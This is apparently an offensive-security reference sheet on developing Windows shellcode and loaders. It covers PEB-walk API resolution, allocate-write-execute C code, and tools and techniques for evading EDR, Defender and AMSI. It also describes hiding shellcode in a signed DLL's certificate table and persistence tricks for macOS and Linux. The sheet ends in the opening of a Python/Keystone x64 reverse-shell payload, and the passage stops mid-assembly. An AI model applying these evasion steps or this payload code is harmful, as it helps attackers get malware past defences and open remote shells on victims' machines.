offensive-shellcode

Shellcode Development Workflow

1. Define concept and target platform (x86/x64, Windows/Linux/macOS)
2. Write assembly using position-independent techniques
3. Extract binary and test in controlled environment
4. Apply null byte avoidance and optimizations
5. Encode/encrypt to evade static detection
6. Package with loader and choose delivery method

Basic Concepts

Execution Pattern (Allocate-Write-Execute)

Avoid direct PAGE_EXECUTE_READWRITE — prefer:

1. Allocate with PAGE_READWRITE
2. Write shellcode to allocated region
3. Call VirtualProtect to switch to PAGE_EXECUTE_READ

char *dest = VirtualAlloc(NULL, 0x1234, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
memcpy(dest, shellcode, 0x1234);
VirtualProtect(dest, 0x1234, PAGE_EXECUTE_READ, &old);
((void(*)())dest)();

Position-Independent Code (PIC) Techniques

Windows API Resolution (PEB Walk)

Identifying kernel32.dll without imports:

1. Get PEB via gs:[0x60] (x64) or fs:[0x30] (x86)
2. Walk PEB->Ldr.InMemoryOrderModuleList — order: exe → ntdll → kernel32
3. Hash-compare module names to locate kernel32
4. Parse the Export Address Table (EAT)
5. Find GetProcAddress by name hash, then resolve LoadLibraryA
6. Use LoadLibraryA to load WS2_32.dll, resolve Winsock functions

WinDbg helpers for debugging PEB walk:

dt nt!_TEB -y ProcessEnvironmentBlock @$teb
dt nt!_PEB -y Ldr <peb_addr>
dt -r _PEB_LDR_DATA <ldr_addr>
dt _LDR_DATA_TABLE_ENTRY (<init_flink_addr> - 0x10)
lm m kernel32   # verify base address
r @r8           # check register

Shellcode Loaders

Loader Responsibilities

• Environment verification / keying (sandbox detection)
• Shellcode decryption
• Safe memory allocation and injection
• Ends its duties after injecting

Recommended languages: Zig (small, no runtime), Rust (secure), Nim, Go (watch for runtime signatures)

Allocation Phase

Avoid RWX allocations — use two-step:

• VirtualAllocEx / NtAllocateVirtualMemory — allocate RW
• ZwCreateSection + NtMapViewOfSection — alternative approach
• After writing: VirtualProtectEx to switch to RX

Other options: code caves, stack/heap (with DEP disabled)

Write Phase

• WriteProcessMemory / NtWriteVirtualMemory
• memcpy to mapped section

Evasion tips:

• Prepend shellcode with dummy opcodes
• Split into chunks, write in randomized order
• Add delays between writes

Execute Phase

Most scrutinized step — EDR checks thread start address against image-backed memory:

Indirect execution resources:

• FlavorTown
• AlternativeShellcodeExec
• ThreadlessInject

PE-to-Shellcode Conversion

Open-source loaders:

• ScareCrow
• NimPackt-v1
• NullGate — indirect syscalls + junk-write sequencing
• DripLoader — chunked RW writes + direct syscalls + JMP trampoline
• ProtectMyTooling — chain multiple protections
• Direct-syscall helpers: SysWhispers3, FreshyCalls (now baseline requirements)

Shellcode Storage & Hiding

Certificate Table technique (recommended):

• Pad Certificate Table with shellcode bytes; update PE headers
• Backdoor only the loader DLL (e.g., ffmpeg.dll in teams.exe)
• Main executable signature remains valid; only the DLL signature breaks

Protection: Compress with LZMA; encrypt with XOR32, RC4, or AES before storing.

Windows 11 24H2 note: AMSI heap scanning is active. Allocate with PAGE_NOACCESS, decrypt in place, then switch to PAGE_EXECUTE_READ to avoid live-heap scans.

Evasion

Progressive Evasion Escalation

1. Basic shellcode execution (baseline)
2. Add XOR/AES encryption + obfuscation
3. Direct syscalls to bypass userland hooks
4. Remote process injection as last resort

Local vs Remote Injection

Remote injection is more detectable:

• CFG / CIG enforcement
• ETW Ti feeds
• EDR call-stack back-tracing (NtOpenProcess invocation source)
• More scrutinized steps: OpenProcess → Allocate → Write → Execute

Defender bypass tools (DefenderBypass):

• myEncoder3.py — XOR-encrypt binary shellcode
• InjectBasic.cpp — basic C++ injector
• InjectCryptXOR.cpp — XOR decrypt + inject
• InjectSyscall-LocalProcess.cpp — direct syscalls, no suspicious IAT entries
• InjectSyscall-RemoteProcess.cpp — remote process injection via direct syscalls

Cross-Platform Considerations

Windows on ARM64 (WoA)

• Syscalls use SVC 0 with ARM64 table in ntdll!KiServiceTableArm64
• Pointer Authentication (PAC) signs LR — avoid stack pivots or re-sign with PACIASP

Linux 6.9+ (eBPF Arena)

• BPF_MAP_TYPE_ARENA maps can hold executable memory
• Hide shellcode chunks in arena map, execute via bpf_prog_run_pin_on_cpu

macOS (Signed System Volume)

• macOS 12+ seals the system partition; unsigned payloads cannot reside there
• Userspace: launch agents, dylib hijacks in /Library/Apple/System/Library/Dyld/
• Kernel persistence: create sealed snapshot, mount RW, inject, resign with kmutil, bless

DripLoader Technique

github.com/xuanxuan0/DripLoader:

1. Reserve 64KB chunks with NO_ACCESS
2. Allocate 4KB RW chunks within that pool
3. Write shellcode in chunks in randomized order
4. Re-protect to RX
5. Overwrite prologue of ntdll!RtlpWow64CtxFromAmd64 with JMP trampoline
6. All calls via direct syscalls: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx

Full x64 Reverse Shell Shellcode (Windows)

Complete Python/Keystone example implementing PEB walk → GetProcAddress → LoadLibraryA → Winsock connect → CreateProcessA(cmd.exe):

import ctypes, struct
from keystone import *

CODE = (
# Locate kernel32 Base Address
    " start:                         "
    "   add rsp, 0xfffffffffffffdf8 ;" # Avoid Null Byte and make some space
    " find_kernel32:                 "
    "   int3                        ;" # WinDbg breakpoint (disable for release)
    "   xor rcx, rcx                ;"
    "   mov rax, gs:[rcx + 0x60]    ;" # RAX = PEB
    "   mov rax, [rax + 0x18]       ;" # RAX = PEB->Ldr
    "   mov rsi, [rax + 0x20]       ;" # RSI = InMemoryOrderModuleList
    "   lodsq                       ;"